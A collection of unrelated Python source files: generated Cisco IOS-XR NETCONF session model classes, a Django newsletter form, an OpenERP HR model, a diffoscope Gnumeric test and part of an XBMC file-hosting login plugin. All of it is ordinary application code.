attribute:: agent\n \n \tNETCONF agent operational information\n \t**type**\\: :py:class:`Agent `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.agent = Netconf.Agent()\n self.agent.parent = self\n\n\n class Agent(object):\n """"""\n NETCONF agent operational information\n \n .. attribute:: tty\n \n \tNETCONF agent over TTY\n \t**type**\\: :py:class:`Tty `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.tty = Netconf.Agent.Tty()\n self.tty.parent = self\n\n\n class Tty(object):\n """"""\n NETCONF agent over TTY\n \n .. attribute:: sessions\n \n \tSession information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = Netconf.Agent.Tty.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n Session information\n \n .. attribute:: session\n \n \tSession information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n Session information\n \n .. attribute:: session_id \n \n \tSession ID\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. 
attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent.Tty.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent.Tty.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent.Tty\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.tty is not None and self.tty._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'/Cisco-IOS-XR-man-xml-ttyagent-oper:netconf\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if 
self.agent is not None and self.agent._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf\'][\'meta_info\']\n\n\nclass XrXml(object):\n """"""\n xr xml\n \n .. attribute:: agent\n \n \tXML agents\n \t**type**\\: :py:class:`Agent `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.agent = XrXml.Agent()\n self.agent.parent = self\n\n\n class Agent(object):\n """"""\n XML agents\n \n .. attribute:: default\n \n \tDefault sessions information\n \t**type**\\: :py:class:`Default `\n \n .. attribute:: ssl\n \n \tSSL sessions information\n \t**type**\\: :py:class:`Ssl `\n \n .. attribute:: tty\n \n \tTTY sessions information\n \t**type**\\: :py:class:`Tty `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.default = XrXml.Agent.Default()\n self.default.parent = self\n self.ssl = XrXml.Agent.Ssl()\n self.ssl.parent = self\n self.tty = XrXml.Agent.Tty()\n self.tty.parent = self\n\n\n class Tty(object):\n """"""\n TTY sessions information\n \n .. attribute:: sessions\n \n \tsessions information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = XrXml.Agent.Tty.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n sessions information\n \n .. attribute:: session\n \n \txml sessions information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n xml sessions information\n \n .. attribute:: session_id \n \n \tSession Id\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. 
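# Illustrative usage (hedged): reading the operational model above with
# ydk-py's classic CRUDService; the device address, port and credentials are
# placeholders, and the provider signature is assumed from the classic API.
from ydk.services import CRUDService
from ydk.providers import NetconfServiceProvider

provider = NetconfServiceProvider(address='192.0.2.1', port=830,
                                  username='admin', password='admin',
                                  protocol='ssh')
netconf_oper = CRUDService().read(provider, Netconf())
for session in netconf_oper.agent.tty.sessions.session:
    print('%s %s %s' % (session.session_id, session.username, session.state))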
attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Tty.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Tty.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Tty\'][\'meta_info\']\n\n\n class Default(object):\n """"""\n Default sessions information\n \n .. attribute:: sessions\n \n \tsessions information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = XrXml.Agent.Default.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n sessions information\n \n .. 
attribute:: session\n \n \txml sessions information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n xml sessions information\n \n .. attribute:: session_id \n \n \tSession Id\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Default.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return 
\'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Default.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Default\'][\'meta_info\']\n\n\n class Ssl(object):\n """"""\n SSL sessions information\n \n .. attribute:: sessions\n \n \tsessions information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = XrXml.Agent.Ssl.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n sessions information\n \n .. attribute:: session\n \n \txml sessions information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n xml sessions information\n \n .. attribute:: session_id \n \n \tSession Id\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. 
attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Ssl.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Ssl.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Ssl\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.default is not None and self.default._has_data():\n return True\n\n if self.ssl is not None and self.ssl._has_data():\n return True\n\n if self.tty is not None and self.tty._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'/Cisco-IOS-XR-man-xml-ttyagent-oper:xr-xml\'\n\n def is_config(self):\n 
\'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.agent is not None and self.agent._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml\'][\'meta_info\']\n\n\n', '__author__ = \'Viktor Kerkez dummy@email.com\'\n__contact__ = dummy@email.com\'\n__date__ = \'20 April 2010\'\n__copyright__ = \'Copyright (c) 2010 Viktor Kerkez\'\n\nimport logging\nfrom django import forms\nfrom django.conf import settings\nfrom google.appengine.api import mail\n\n# perart imports\nfrom perart import models\n\nclass PerArtForm(forms.ModelForm):\n tinymce = True\n\nclass ProgramForm(PerArtForm):\n class Meta:\n model = models.Program\n exclude = [\'url\']\n\n\nclass ProjectForm(PerArtForm):\n class Meta:\n model = models.Project\n exclude = [\'url\']\n\n\nclass NewsForm(PerArtForm):\n class Meta:\n model = models.News\n exclude = [\'url\']\n\n\nclass MenuForm(PerArtForm):\n tinymce = False\n\n class Meta:\n model = models.Menu\n exclude = [\'url\']\n\n\nclass GalleryForm(PerArtForm):\n class Meta:\n model = models.Gallery\n exclude = [\'url\']\n\n\nclass NewsletterForm(forms.Form):\n name = forms.CharField(required=True)\n email = forms.EmailField(required=True)\n \n def send_email(self):\n try:\n mail.send_mail(dummy@email.com\',\n to=settings.PERART_EMAIL,\n subject=\'""%(name)s"" se prijavio za newsletter\' % self.cleaned_data,\n body=\'Ime: %(name)s\\nEmail: %(email)s\' % self.cleaned_data)\n return True\n except:\n logging.exception(\'sending message failed\')\n return False\n ', '#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Pedro Arroyo M dummy@email.com\n# Copyright (C) 2015 Mall Connection().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
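# Illustrative usage (hedged): driving NewsletterForm above from a request
# handler. is_valid() populates cleaned_data, which send_email() interpolates
# into the notification mail.
form = NewsletterForm({'name': 'Ana', 'email': 'dummy@email.com'})
if form.is_valid():
    sent = form.send_email()   # False (and a logged exception) on failure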
If not, see .\n#\n############################################################################## \n\n\nfrom osv import osv\nfrom osv import fields\n\nclass hr_family_responsibilities(osv.osv):\n \'\'\'\n Open ERP Model\n \'\'\'\n _name = \'hr.family.responsibilities\'\n _description = \'openerpmodel\'\n \n _columns = {\n \'name\':fields.char(\'Name\', size=64, required=True, readonly=False),\n \'type\':fields.selection([\n (\'simple\',\'simple responsibility\'),\n (\'maternal\',\'maternal responsibility\'),\n (\'invalid\',\'invalid responsibility\'),\n ], \'State\', select=True),\n \'relationship\':fields.selection([\n (\'father\',\'father\'),\n (\'son\',\'son / daughter\'),\n (\'spouse\',\'spouse\'),\n (\'Father in law\',\'Father in law / mother in law\'),\n (\'son\',\'son / daughter\'),\n (\'second\',\'second\'),\n (\'Grandfather\',\'Grandfather / Grandmother\'),\n (\'grandchild\',\'grandchild / granddaughter\'),\n (\'sister\',\'sister / brother\'),\n (\'brother in law\',\'brother in law / sister in law\'),\n ], \'Relationship\', select=True, readonly=False),\n \'vat\': fields.char(\'TIN\', size=32, help=""Tax Identification Number. Check the box if this contact is subjected to taxes. Used by the some of the legal statements.""),\n \'employee_id\': fields.many2one(\'hr.employee\', string=\'Employee\'),\n \n }\nhr_family_responsibilities()', ""# -*- coding: utf-8 -*-\n#\n# diffoscope: in-depth comparison of files, archives, and directories\n#\n# Copyright © 2018 Chris Lamb dummy@email.com\n#\n# diffoscope is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# diffoscope is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with diffoscope. 
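# Illustrative usage (hedged): creating a record on the legacy OpenERP 6.x
# osv model above from server-side code; `cr`, `uid` and `employee_id` are
# assumed to be in scope, and the field values are illustrative.
vals = {
    'name': 'Maria',
    'type': 'simple',
    'relationship': 'spouse',
    'vat': '12345678-9',
    'employee_id': employee_id,
}
resp_obj = self.pool.get('hr.family.responsibilities')
resp_id = resp_obj.create(cr, uid, vals)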
If not, see .\n\nimport pytest\n\nfrom diffoscope.comparators.gnumeric import GnumericFile\n\nfrom ..utils.data import load_fixture, get_data\nfrom ..utils.tools import skip_unless_tools_exist\nfrom ..utils.nonexisting import assert_non_existing\n\ngnumeric1 = load_fixture('test1.gnumeric')\ngnumeric2 = load_fixture('test2.gnumeric')\n\n\ndef test_identification(gnumeric1):\n assert isinstance(gnumeric1, GnumericFile)\n\n\ndef test_no_differences(gnumeric1):\n difference = gnumeric1.compare(gnumeric1)\n assert difference is None\n\n\n@pytest.fixture\ndef differences(gnumeric1, gnumeric2):\n return gnumeric1.compare(gnumeric2).details\n\n\n@skip_unless_tools_exist('ssconvert')\ndef test_diff(differences):\n expected_diff = get_data('gnumeric_expected_diff')\n assert differences[0].unified_diff == expected_diff\n\n\n@skip_unless_tools_exist('ssconvert')\ndef test_compare_non_existing(monkeypatch, gnumeric1):\n assert_non_existing(monkeypatch, gnumeric1, has_null_source=False)\n"", '\'\'\'\n xfilesharing XBMC Plugin\n Copyright (C) 2013-2014 ddurdle\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\n\n\'\'\'\n\nimport cloudservice\nimport os\nimport re\nimport urllib, urllib2\nimport cookielib\n\n\nimport xbmc, xbmcaddon, xbmcgui, xbmcplugin\n\n# global variables\nPLUGIN_NAME = \'plugin.video.cloudstream\'\nPLUGIN_URL = \'plugin://\'+PLUGIN_NAME+\'/\'\nADDON = xbmcaddon.Addon(id=PLUGIN_NAME)\n\n# helper methods\ndef log(msg, err=False):\n if err:\n xbmc.log(ADDON.getAddonInfo(\'name\') + \': \' + msg, xbmc.LOGERROR)\n else:\n xbmc.log(ADDON.getAddonInfo(\'name\') + \': \' + msg, xbmc.LOGDEBUG)\n\n\n#\n#\n#\nclass xfilesharing(cloudservice.cloudservice):\n\n\n # magic numbers\n MEDIA_TYPE_VIDEO = 1\n MEDIA_TYPE_FOLDER = 0\n\n ##\n # initialize (setting 1) username, 2) password, 3) authorization token, 4) user agent string\n ##\n def __init__(self, name, domain, user, password, auth, user_agent):\n return super(xfilesharing,self).__init__(name, domain, user, password, auth, user_agent)\n #return cloudservice.__init__(self,domain, user, password, auth, user_agent)\n\n\n\n ##\n # perform login\n ##\n def login(self):\n\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n # default User-Agent (\'Python-urllib/2.6\') will *not* work\n opener.addheaders = [(\'User-Agent\', self.user_agent)]\n\n if self.domain == \'uptostream.com\':\n self.domain = \'uptobox.com\'\n\n if \'http://\' in self.domain:\n url = self.domain\n else:\n url = \'http://\' + self.domain + \'/\'\n\n\n\n values = {\n \'op\' : \'login\',\n \'login\' : self.user,\n \'redirect\' : url,\n \'password\' : self.password\n }\n\n\n\n # try login\n try:\n response = opener.open(url,urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403:\n #login denied\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))\n log(str(e), True)\n return\n response_data = response.read()\n response.close()\n\n loginResult = False\n 
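# Illustrative sketch (hedged, not the plugin's method): the two
# re.finditer() loops below reduce to a single membership test. The
# post-login page is scanned for account-only markers ('my_account' or
# 'logout'); seeing either one means the credentials were accepted.
def _looks_logged_in(response_data):
    return bool(re.search('my_account|logout', response_data))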
